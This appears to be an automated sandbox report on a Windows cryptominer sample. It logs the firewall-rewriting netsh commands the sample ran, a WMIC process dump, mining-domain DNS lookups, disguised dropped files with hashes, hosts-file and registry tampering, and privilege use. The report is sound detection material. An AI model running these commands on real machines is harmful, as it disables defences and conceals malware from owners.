netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd /c wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value >"C:\Program Files\ls.txt"&exit

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value

Network

Country Destination Domain Proto
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp

Files

C:\Program Files\Common Files\Microsoft Shared\jakbpcjd\dwm.exe

MD5 99d91a5ca408888ad0139ba017c263b0
SHA1 ee00c4cbb144833ea37557e09dab4d036cf491e3
SHA256 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
SHA512 8910a22fe0a3a660e22fb8c8220abe6df6356eea3c342614dddb658bef7bc5c200fe605abdbde0ba50a61fa0e5fef9aae9f2bd083dff0bcfd4a204ed043bc164

C:\ProgramData\Microsoft\Windows\Templates\gahbpcrd\Imjpmig.exe

MD5 d5f810d2810eb4412a5920a677d1bef1
SHA1 5d518c9c5b1097708b80ff572501e195b381c30c
SHA256 33ca0835da8d32f6e187f8a6376720fdf5e417530df7039d01841787cf513d51
SHA512 b308b9b8ba9d801fe0d0906401263621c7a84113277202feaad50d1e832e3af80131c8794e26ad61ee4c6e62e8404b343493c2186076c9ef6d584fb8b8f09663

C:\Program Files\common files\system\wk.ini

MD5 a7b45e477cde8d6961abe2784a24cd1a
SHA1 3dd8ca9999258337da24e158d83c06bac3f546ee
SHA256 9bf4df16711b4f831cd9979af2d0b616c0530e5b1ba311b29a9b63e948248b4c
SHA512 a25e27c85c5693ce198d87cf8d5d4127635aa18d50f3b48232e3dc6bb98d451f6d6c7b6acce6d0f38ddef230efb098fd5279f601befd97f4ba33daf6f4183ec9

memory/2832-13-0x0000000000400000-0x0000000000498000-memory.dmp

memory/1240-12-0x0000000000A70000-0x0000000000B08000-memory.dmp

C:\Windows\Fonts\banbecud\Wscntfy.exe

MD5 6a45590b819f385305ef39c912c134e8
SHA1 7916b19ad989ecd1eff12a7de52668f674335f2f
SHA256 e3258f7c8e2be3a5eeaa697b80fc1b3cc64b84a933e551c802c7479b86768db4
SHA512 1849029c7e433f5681848f0c8945d565873b2ec7164f9db71abbd3f5b59e3ad83b03f0be62666d2fc77b409565207500a2d29b30ce0a43aa8a67e7e999dd3dad

C:\Program Files\common files\system\jk.ini

MD5 f895344ab3b578bd7b68364044e26d76
SHA1 bfa5f38963c424ad48b712b712627b0cc4c1055f
SHA256 8ea5212859cfd7eba7c691e3a115fffbabd8ad626629b6313ca3719952b0ef8a
SHA512 5a01cad8b4ff238b2657a2810cfc146c92fa787effa39295f9b24bfda50005db10c457a47aeb57fc2f8166a6513b6240c568c32f4199eb8a89082976349b2d84

memory/1752-17-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/2832-19-0x0000000000400000-0x0000000000498000-memory.dmp

memory/1752-21-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Program Files\ls.txt

MD5 ad15cdc0461479b82fd27d06568cb72f
SHA1 bdcd6c2fdd39858c304880e5d7c0dcb67ffc8745
SHA256 cbb873b0119c092380a2dc9ac9cfc0ec8c7f054c0b57f0fefe01151d9e1bc55d
SHA512 1742c58168c612f7e3631d7a0c5c821a2dfd9be52a1b4323089c5c8151c646b7d9c06dc015fd53bc4f426d6d18eb276b8d5575864501c6f856ff48b243f09745

memory/1752-33-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1752-39-0x0000000000400000-0x00000000004D3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-12 14:46

Reported

2024-10-12 14:49

Platform

win10v2004-20241007-en

Max time kernel

119s

Max time network

116s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File created \??\c:\windows\system32\drivers\etc\hosts_bak C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
File opened for modification \??\c:\windows\system32\drivers\etc\hosts_bak C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
File created \??\c:\windows\system32\drivers\etc\hosts C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Indicator Removal: File Deletion

defense_evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\eajbdcmd C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\wk.ini C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
File opened for modification C:\Program Files\common files\system\wk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\common files\system\jk.ini C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
File opened for modification C:\Program Files\common files\system\jk.ini C:\Windows\system32\attrib.exe N/A
File created C:\Program Files\ls.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\gambecxd\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
